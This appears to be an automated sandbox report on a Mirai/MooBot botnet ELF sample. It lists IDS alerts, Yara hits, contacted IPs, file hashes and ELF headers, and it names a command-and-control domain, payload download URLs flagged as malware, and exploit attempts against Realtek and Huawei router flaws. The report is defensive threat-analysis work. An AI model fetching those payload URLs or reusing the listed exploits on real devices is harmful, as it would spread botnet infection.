                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTR
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts1
                      Command and Scripting Interpreter
                      1
                      Scripting
                      Path InterceptionDirect Volume Access1
                      OS Credential Dumping
                      11
                      Security Software Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
                      Ingress Tool Transfer
                      Scheduled TransferData Encrypted for Impact
                      No configs have been found
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Number of created Files
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1477275 Sample: faBNhIKHq4.elf Startdate: 20/07/2024 Architecture: LINUX Score: 100 20 69.248.9.25, 34477, 37215 COMCAST-7922US United States 2->20 22 82.50.208.202, 33453, 52869 ASN-IBSNAZIT Italy 2->22 24 99 other IPs or domains 2->24 26 Snort IDS alert for network traffic 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 7 other signatures 2->32 8 faBNhIKHq4.elf 2->8         started        signatures3 process4 process5 10 faBNhIKHq4.elf 8->10         started        process6 12 faBNhIKHq4.elf 10->12         started        14 faBNhIKHq4.elf 10->14         started        16 faBNhIKHq4.elf 10->16         started        18 2 other processes 10->18
                      SourceDetectionScannerLabelLink
                      faBNhIKHq4.elf56%VirustotalBrowse
                      faBNhIKHq4.elf100%AviraEXP/ELF.Mirai.Z.A
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      vector.mineheaven.org1%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://127.0.0.1:52869/wanipcn.xml0%Avira URL Cloudsafe
                      http://127.0.0.1:52869/picdesc.xml0%Avira URL Cloudsafe
                      http://15.235.203.214/bolonetwork.x86100%Avira URL Cloudmalware
                      http://15.235.203.214/bolonetwork.mips100%Avira URL Cloudmalware
                      http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                      http://127.0.0.1:52869/picdesc.xml1%VirustotalBrowse
                      http://127.0.0.1:52869/wanipcn.xml1%VirustotalBrowse
                      http://15.235.203.214/bolonetwork.mips0%VirustotalBrowse
                      http://15.235.203.214/bolonetwork.x860%VirustotalBrowse
                      http://purenetworks.com/HNAP1/2%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      vector.mineheaven.org
                      15.235.203.214
                      truetrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:52869/picdesc.xmlfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://127.0.0.1:52869/wanipcn.xmlfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/soap/encoding/faBNhIKHq4.elffalse
                      • URL Reputation: safe
                      unknown
                      http://15.235.203.214/bolonetwork.mipsfaBNhIKHq4.elffalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://purenetworks.com/HNAP1/faBNhIKHq4.elffalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://15.235.203.214/bolonetwork.x86faBNhIKHq4.elffalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/faBNhIKHq4.elffalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      221.235.206.72
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      66.223.211.238
                      unknownUnited States
                      8047GCIUSfalse
                      53.64.1.46
                      unknownGermany
                      31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                      182.165.110.222
                      unknownJapan17511OPTAGEOPTAGEIncJPfalse
                      45.248.44.127
                      unknownUnited States
                      26464JOYENT-INC-USfalse
                      166.2.82.27
                      unknownUnited States
                      4152USDA-1USfalse
                      222.83.6.89
                      unknownChina
                      137695CHINATELECOM-XINJIANG-WULUMUQI-MANCHINATELECOMXinjiangWulfalse
                      58.207.174.192
                      unknownChina
                      4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                      143.204.223.67
                      unknownUnited States
                      16509AMAZON-02USfalse
                      88.57.88.129
                      unknownItaly
                      3269ASN-IBSNAZITfalse
                      168.121.46.26
                      unknownPeru
                      27843OPTICALTECHNOLOGIESSACPEfalse
                      133.42.124.102
                      unknownJapan24248ASN-WADAI-UWakayamaUniversityJPfalse
                      157.182.220.13
                      unknownUnited States
                      12118WVUUSfalse
                      62.176.105.185
                      unknownBulgaria
                      8866BTC-ASBULGARIABGfalse
                      88.141.51.61
                      unknownFrance
                      8228CEGETEL-ASFRfalse
                      95.33.71.177
                      unknownGermany
                      9145EWETELCloppenburgerStrasse310DEfalse
                      147.251.54.93
                      unknownCzech Republic
                      2852CESNET2CZfalse
                      79.80.101.126
                      unknownFrance
                      15557LDCOMNETFRfalse
                      136.0.81.193
                      unknownUnited States
                      18779EGIHOSTINGUSfalse
                      89.223.76.248
                      unknownRussian Federation
                      49345CONTINENTAL_GROUP-ASRUfalse
                      196.164.216.211
                      unknownSouth Africa
                      328065Vast-Networks-ASZAfalse
                      18.105.120.229
                      unknownUnited States
                      3MIT-GATEWAYSUSfalse
                      185.225.252.146
                      unknownUnited Kingdom
                      31727NODE4-ASGBfalse
                      163.178.130.161
                      unknownCosta Rica
                      11830InstitutoCostarricensedeElectricidadyTelecomCRfalse
                      110.164.214.181
                      unknownThailand
                      45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                      101.208.199.62
                      unknownIndia
                      58519CHINATELECOM-CTCLOUDCloudComputingCorporationCNfalse
                      183.198.179.50
                      unknownChina
                      24547CMNET-V4HEBEI-AS-APHebeiMobileCommunicationCompanyLimitfalse
                      208.159.93.33
                      unknownUnited States
                      11139CWC-ROC-11139DMfalse
                      182.37.74.31
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      118.98.130.54
                      unknownIndonesia
                      17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDfalse
                      155.191.174.159
                      unknownUnited States
                      20437AS20437USfalse
                      155.75.2.112
                      unknownUnited States
                      4010DNIC-AS-04010USfalse
                      102.21.121.140
                      unknownunknown
                      37054Telecom-MalagasyMGfalse
                      106.21.49.247
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      213.249.241.124
                      unknownUnited Kingdom
                      12390KINGSTON-UK-ASGBfalse
                      60.181.115.91
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      72.166.124.103
                      unknownUnited States
                      209CENTURYLINK-US-LEGACY-QWESTUSfalse
                      166.228.206.28
                      unknownUnited States
                      6614USCC-ASNUSfalse
                      104.150.207.168
                      unknownUnited States
                      1832SMUUSfalse
                      169.66.107.17
                      unknownUnited States
                      37611AfrihostZAfalse
                      138.236.1.11
                      unknownUnited States
                      17234GACUSfalse
                      78.87.232.152
                      unknownGreece
                      3329HOL-GRAthensGreeceGRfalse
                      198.75.127.79
                      unknownUnited States
                      35350AS_SCHWARZ_PHARMA_AGAlfred-Nobel-Str10DEfalse
                      180.52.246.181
                      unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                      151.115.223.78
                      unknownUnited Kingdom
                      12876OnlineSASFRfalse
                      88.120.10.203
                      unknownFrance
                      12322PROXADFRfalse
                      105.118.80.86
                      unknownNigeria
                      36873VNL1-ASNGfalse
                      69.248.9.25
                      unknownUnited States
                      7922COMCAST-7922UStrue
                      87.151.1.53
                      unknownGermany
                      3320DTAGInternetserviceprovideroperationsDEfalse
                      109.105.104.108
                      unknownSweden
                      2603NORDUNETNOfalse
                      158.188.7.83
                      unknownUnited States
                      393938SSL-ASUSfalse
                      109.106.253.207
                      unknownSerbia
                      199493NETNET-ASRSfalse
                      41.119.144.171
                      unknownSouth Africa
                      16637MTNNS-ASZAfalse
                      112.94.80.12
                      unknownChina
                      17622CNCGROUP-GZChinaUnicomGuangzhounetworkCNfalse
                      82.50.208.202
                      unknownItaly
                      3269ASN-IBSNAZITtrue
                      97.178.154.176
                      unknownUnited States
                      6167CELLCO-PARTUSfalse
                      92.128.15.29
                      unknownFrance
                      3215FranceTelecom-OrangeFRfalse
                      82.235.175.188
                      unknownFrance
                      12322PROXADFRfalse
                      82.127.97.23
                      unknownFrance
                      3215FranceTelecom-OrangeFRfalse
                      101.118.159.79
                      unknownAustralia
                      133612VODAFONE-AS-APVodafoneAustraliaPtyLtdAUfalse
                      210.159.240.128
                      unknownJapan10013FBDCFreeBitCoLtdJPfalse
                      198.21.126.176
                      unknownUnited States
                      6167CELLCO-PARTUSfalse
                      88.160.132.174
                      unknownFrance
                      12322PROXADFRfalse
                      110.17.77.126
                      unknownChina
                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                      36.224.35.213
                      unknownTaiwan; Republic of China (ROC)
                      3462HINETDataCommunicationBusinessGroupTWfalse
                      95.76.9.54
                      unknownRomania
                      6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                      154.12.179.185
                      unknownUnited States
                      55286SERVER-MANIACAfalse
                      207.243.41.153
                      unknownUnited States
                      7018ATT-INTERNET4USfalse
                      141.170.2.175
                      unknownUnited Kingdom
                      33920AQLGBfalse
                      202.243.177.47
                      unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                      88.189.21.70
                      unknownFrance
                      12322PROXADFRfalse
                      24.26.58.210
                      unknownUnited States
                      10796TWC-10796-MIDWESTUSfalse
                      199.233.13.46
                      unknownUnited States
                      54113FASTLYUSfalse
                      142.183.249.136
                      unknownCanada
                      577BACOMCAfalse
                      141.89.138.130
                      unknownGermany
                      680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                      41.170.8.16
                      unknownSouth Africa
                      36937Neotel-ASZAfalse
                      95.115.138.19
                      unknownGermany
                      6805TDDE-ASN1DEfalse
                      199.97.124.45
                      unknownUnited States
                      174COGENT-174USfalse
                      197.105.252.117
                      unknownSouth Africa
                      37168CELL-CZAfalse
                      9.125.31.31
                      unknownUnited States
                      3356LEVEL3USfalse
                      185.149.136.17
                      unknownLuxembourg
                      2602RESTENAReseauTeleinformatiquedelEducationNationaleLUfalse
                      209.174.192.179
                      unknownUnited States
                      6325ILLINOIS-CENTURYUSfalse
                      191.103.84.77
                      unknownHonduras
                      23383METROREDSADECVHNfalse
                      212.252.124.210
                      unknownTurkey
                      199333YKB-ASTRfalse
                      85.158.231.100
                      unknownAustria
                      8692BRZATfalse
                      81.244.221.167
                      unknownBelgium
                      5432PROXIMUS-ISP-ASBEfalse
                      58.228.164.237
                      unknownKorea Republic of
                      9318SKB-ASSKBroadbandCoLtdKRfalse
                      96.4.121.112
                      unknownUnited States
                      11686ENAUSfalse
                      132.247.83.26
                      unknownMexico
                      278UniversidadNacionalAutonomadeMexicoMXfalse
                      197.152.177.247
                      unknownTanzania United Republic of
                      37133airtel-tz-asTZfalse
                      95.236.203.136
                      unknownItaly
                      3269ASN-IBSNAZITfalse
                      149.22.214.174
                      unknownUnited States
                      48945IFNL-ASGBfalse
                      99.161.69.48
                      unknownUnited States
                      7018ATT-INTERNET4USfalse
                      122.226.226.208
                      unknownChina
                      136190CHINATELECOM-ZHEJIANG-JINHUA-IDCJINHUAZHEJIANGProvincefalse
                      49.113.148.253
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      118.125.206.189
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      149.253.222.200
                      unknownUnited States
                      20473AS-CHOOPAUSfalse
                      140.79.225.97
                      unknownAustralia
                      6262CSIROCommonwealthScientificandIndustrialAUfalse
                      111.153.205.141
                      unknownChina
                      9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                      121.197.237.77
                      unknownChina
                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      208.159.93.33TO9JIt5cu4.elfGet hashmaliciousUnknownBrowse
                        182.37.74.31rnQYDw7A4GGet hashmaliciousUnknownBrowse
                          182.165.110.222wRfdZrhg7I.elfGet hashmaliciousUnknownBrowse
                            155.191.174.1595UJyp59w4f.elfGet hashmaliciousMiraiBrowse
                              166.2.82.271isequal9.armGet hashmaliciousMiraiBrowse
                                157.182.220.13BtyV8egdsx.elfGet hashmaliciousMirai, MoobotBrowse
                                  62.176.105.185vTJGG33WsQGet hashmaliciousMiraiBrowse
                                    JAGTPJ9md2Get hashmaliciousMiraiBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      vector.mineheaven.orgEKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 15.235.203.214
                                      http://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                      • 15.235.203.214
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CHINANET-BACKBONENo31Jin-rongStreetCNEKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 175.10.89.25
                                      http://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                      • 182.96.46.135
                                      92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 49.88.41.214
                                      92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 106.84.145.148
                                      92.249.48.47-skid.arm-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 220.168.227.139
                                      92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 222.92.128.106
                                      92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 115.230.55.193
                                      92.249.48.47-skid.sh4-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 106.119.126.235
                                      92.249.48.47-skid.mpsl-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 114.102.21.238
                                      92.249.48.47-skid.mips-2024-07-20T09_04_16.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 182.97.246.41
                                      DAIMLER-ASITIGNGlobalNetworkDEhttp://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                      • 53.50.38.201
                                      92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 53.198.188.88
                                      92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 53.37.211.44
                                      92.249.48.47-skid.m68k-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 53.217.0.215
                                      U8E1VlGTmr.elfGet hashmaliciousMiraiBrowse
                                      • 53.47.0.9
                                      TWzzHuqCOF.elfGet hashmaliciousMiraiBrowse
                                      • 53.189.37.193
                                      Qa5qvgWyUn.elfGet hashmaliciousMiraiBrowse
                                      • 53.188.22.87
                                      8tGqHMzByM.elfGet hashmaliciousMiraiBrowse
                                      • 53.88.213.155
                                      MCiOZ89mRZ.elfGet hashmaliciousMiraiBrowse
                                      • 53.59.108.237
                                      arm.elfGet hashmaliciousMiraiBrowse
                                      • 53.229.183.49
                                      GCIUS3RzVV7rQr8.elfGet hashmaliciousMiraiBrowse
                                      • 24.237.169.201
                                      mips.nn.elfGet hashmaliciousMiraiBrowse
                                      • 24.237.122.202
                                      bWT2t63tyx.elfGet hashmaliciousMiraiBrowse
                                      • 69.178.35.15
                                      UyWmCsMy4T.elfGet hashmaliciousMiraiBrowse
                                      • 206.174.112.141
                                      YIHfMPPeSC.elfGet hashmaliciousUnknownBrowse
                                      • 206.175.88.167
                                      RTuZgpOzBm.elfGet hashmaliciousUnknownBrowse
                                      • 69.178.11.11
                                      98zdN8lGtk.elfGet hashmaliciousUnknownBrowse
                                      • 66.58.243.194
                                      4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                      • 206.174.112.133
                                      jLntRRok3B.elfGet hashmaliciousMiraiBrowse
                                      • 206.174.97.50
                                      SecuriteInfo.com.Linux.Siggen.9999.522.25935.elfGet hashmaliciousMiraiBrowse
                                      • 69.178.11.60
                                      OPTAGEOPTAGEIncJPEKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 112.70.224.14
                                      5Jan3SztHt.elfGet hashmaliciousUnknownBrowse
                                      • 150.57.234.61
                                      botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 121.85.169.11
                                      jew.x86.elfGet hashmaliciousMiraiBrowse
                                      • 128.27.24.65
                                      2ta71O8iWY.elfGet hashmaliciousMiraiBrowse
                                      • 150.57.158.246
                                      jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                      • 182.165.110.206
                                      ikFn0h3xhF.elfGet hashmaliciousMiraiBrowse
                                      • 119.228.168.81
                                      103.162.20.166-sora.arm6-2024-06-28T11_40_37.elfGet hashmaliciousMiraiBrowse
                                      • 119.231.103.83
                                      s4WsI8Qcm4.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 60.57.202.187
                                      botx.mips.elfGet hashmaliciousMiraiBrowse
                                      • 160.233.146.153
                                      No context
                                      No context
                                      Process:/tmp/faBNhIKHq4.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):20
                                      Entropy (8bit):4.1219280948873624
                                      Encrypted:false
                                      SSDEEP:3:TgKd8G:TgKd8G
                                      MD5:19E2DC1E34D98974165E83A637EA8607
                                      SHA1:823676B3F66B99921640256B1C1BE125BD74343E
                                      SHA-256:72A6392F095B338C66CEF3692A32E32AA3D8E410C470C53E2A59330982D6BECC
                                      SHA-512:43993CA3D5F3260E3FA145A355EABF37C6E8AE48497F20C0E8EBFAE1805695745544EB8F792547A4164F693603D548E00A39FA20E536ECDA00799FD84A9FDC7B
                                      Malicious:false
                                      Reputation:low
                                      Preview:/tmp/faBNhIKHq4.elf.
                                      Process:/tmp/faBNhIKHq4.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):20
                                      Entropy (8bit):4.1219280948873624
                                      Encrypted:false
                                      SSDEEP:3:TgKd8G:TgKd8G
                                      MD5:19E2DC1E34D98974165E83A637EA8607
                                      SHA1:823676B3F66B99921640256B1C1BE125BD74343E
                                      SHA-256:72A6392F095B338C66CEF3692A32E32AA3D8E410C470C53E2A59330982D6BECC
                                      SHA-512:43993CA3D5F3260E3FA145A355EABF37C6E8AE48497F20C0E8EBFAE1805695745544EB8F792547A4164F693603D548E00A39FA20E536ECDA00799FD84A9FDC7B
                                      Malicious:false
                                      Reputation:low
                                      Preview:/tmp/faBNhIKHq4.elf.
                                      Process:/tmp/faBNhIKHq4.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):35
                                      Entropy (8bit):4.536286231168866
                                      Encrypted:false
                                      SSDEEP:3:TgKd8EqpWOJn:TgKd8EQ
                                      MD5:E9B50B0ED76B69FFB548FC2D29D59F6F
                                      SHA1:0B5A0A92F818A6336FF53BBD2E2C6BA2928EFD56
                                      SHA-256:C53D771DE7EC709C9A61CB2D7FBCB1808AC5BD383CA617B653F8793A0A71A35A
                                      SHA-512:8EB797DFA32C3021557C379C535FBF12369CDA6FBB288F448548407BFFA2E1C8FF5198269A84BCA9EC96F4451E46673D1182ADE3DE3DD300CFA9F8F7E9E34A2E
                                      Malicious:false
                                      Reputation:low
                                      Preview:/tmp/faBNhIKHq4.elf./tmp/owfrxsjybl
                                      Process:/tmp/faBNhIKHq4.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):20
                                      Entropy (8bit):4.1219280948873624
                                      Encrypted:false
                                      SSDEEP:3:TgKd8G:TgKd8G
                                      MD5:19E2DC1E34D98974165E83A637EA8607
                                      SHA1:823676B3F66B99921640256B1C1BE125BD74343E
                                      SHA-256:72A6392F095B338C66CEF3692A32E32AA3D8E410C470C53E2A59330982D6BECC
                                      SHA-512:43993CA3D5F3260E3FA145A355EABF37C6E8AE48497F20C0E8EBFAE1805695745544EB8F792547A4164F693603D548E00A39FA20E536ECDA00799FD84A9FDC7B
                                      Malicious:false
                                      Reputation:low
                                      Preview:/tmp/faBNhIKHq4.elf.
                                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                      Entropy (8bit):5.759644882713048
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:faBNhIKHq4.elf
                                      File size:163'904 bytes
                                      MD5:62d53c7ec4c2752331182c31d8176b47
                                      SHA1:312d29a7d5949df5fa005a40e7bca89c59cb0f2c
                                      SHA256:f36cf9f570a3d59a4bc0942b1e6cfde4faf83586ca5b9ba20c0b1f0d91c4868d
                                      SHA512:818108efcf1474cfcc0ebb29385e66e4b2f98a6f24f12da8f38d78b577d8f4e107989adfd369b9ba2d32feed3c3b55a8e65ccef62956e7575d5298d5bd0dd34d
                                      SSDEEP:3072:GjGNGb75OOAdal+7ZU+i78ejIlFJ54ta7LdvRnP417Ayqi0:GjCUHjqT54tcLNRPS7Ayqh
                                      TLSH:69F31845FC515B22C6C612BBFB5E428D3B2A17E8D3EE7103AD255F24378A85B0E37642
                                      File Content Preview:.ELF...a..........(.........4....~......4. ...(.....................@5..@5..............D5..D5..D5..,I..............Q.td..................................-...L."....~..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                      ELF header

                                      Class:ELF32
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:ARM
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:ARM - ABI
                                      ABI Version:0
                                      Entry Point Address:0x8190
                                      Flags:0x202
                                      ELF Header Size:52
                                      Program Header Offset:52
                                      Program Header Size:32
                                      Number of Program Headers:3
                                      Section Header Offset:163504
                                      Section Header Size:40
                                      Number of Section Headers:10
                                      Header String Table Index:9
                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                      NULL0x00x00x00x00x0000
                                      .initPROGBITS0x80940x940x180x00x6AX004
                                      .textPROGBITS0x80b00xb00x1fa700x00x6AX0016
                                      .finiPROGBITS0x27b200x1fb200x140x00x6AX004
                                      .rodataPROGBITS0x27b340x1fb340x3a0c0x00x2A004
                                      .ctorsPROGBITS0x335440x235440xc0x00x3WA004
                                      .dtorsPROGBITS0x335500x235500x80x00x3WA004
                                      .dataPROGBITS0x335600x235600x49100x00x3WA0032
                                      .bssNOBITS0x37e700x27e700xc7940x00x3WA004
                                      .shstrtabSTRTAB0x00x27e700x3e0x00x0001
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x80000x80000x235400x235406.17550x5R E0x8000.init .text .fini .rodata
                                      LOAD0x235440x335440x335440x492c0x110c00.41340x6RW 0x8000.ctors .dtors .data .bss
                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      07/20/24-23:01:41.463722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4660452869192.168.2.23204.152.123.98
                                      07/20/24-23:01:46.955966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586252869192.168.2.23161.89.104.148
                                      07/20/24-23:01:03.930422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5504052869192.168.2.23111.252.253.89
                                      07/20/24-23:01:32.076593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536437215192.168.2.23197.76.87.111
                                      07/20/24-23:01:13.282996TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615750052869192.168.2.23211.27.252.180
                                      07/20/24-23:01:45.122550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24790452869192.168.2.23191.68.229.244
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360037215192.168.2.2341.131.89.154
                                      07/20/24-23:01:20.132511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081837215192.168.2.23157.63.12.48
                                      07/20/24-23:01:08.659435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283852869192.168.2.234.194.116.48
                                      07/20/24-23:01:02.422228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5752252869192.168.2.23104.178.230.186
                                      07/20/24-23:01:41.318733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615529852869192.168.2.23102.22.43.107
                                      07/20/24-23:01:48.965786TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25806852869192.168.2.2342.135.139.61
                                      07/20/24-23:01:42.944606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613824652869192.168.2.2324.28.111.138
                                      07/20/24-23:01:02.724151TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174652869192.168.2.23115.161.142.144
                                      07/20/24-23:01:45.432263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25354852869192.168.2.23204.16.50.125
                                      07/20/24-23:01:47.808678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195452869192.168.2.23133.83.21.166
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138837215192.168.2.23131.154.57.89
                                      07/20/24-23:01:42.549328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5216052869192.168.2.23220.250.27.9
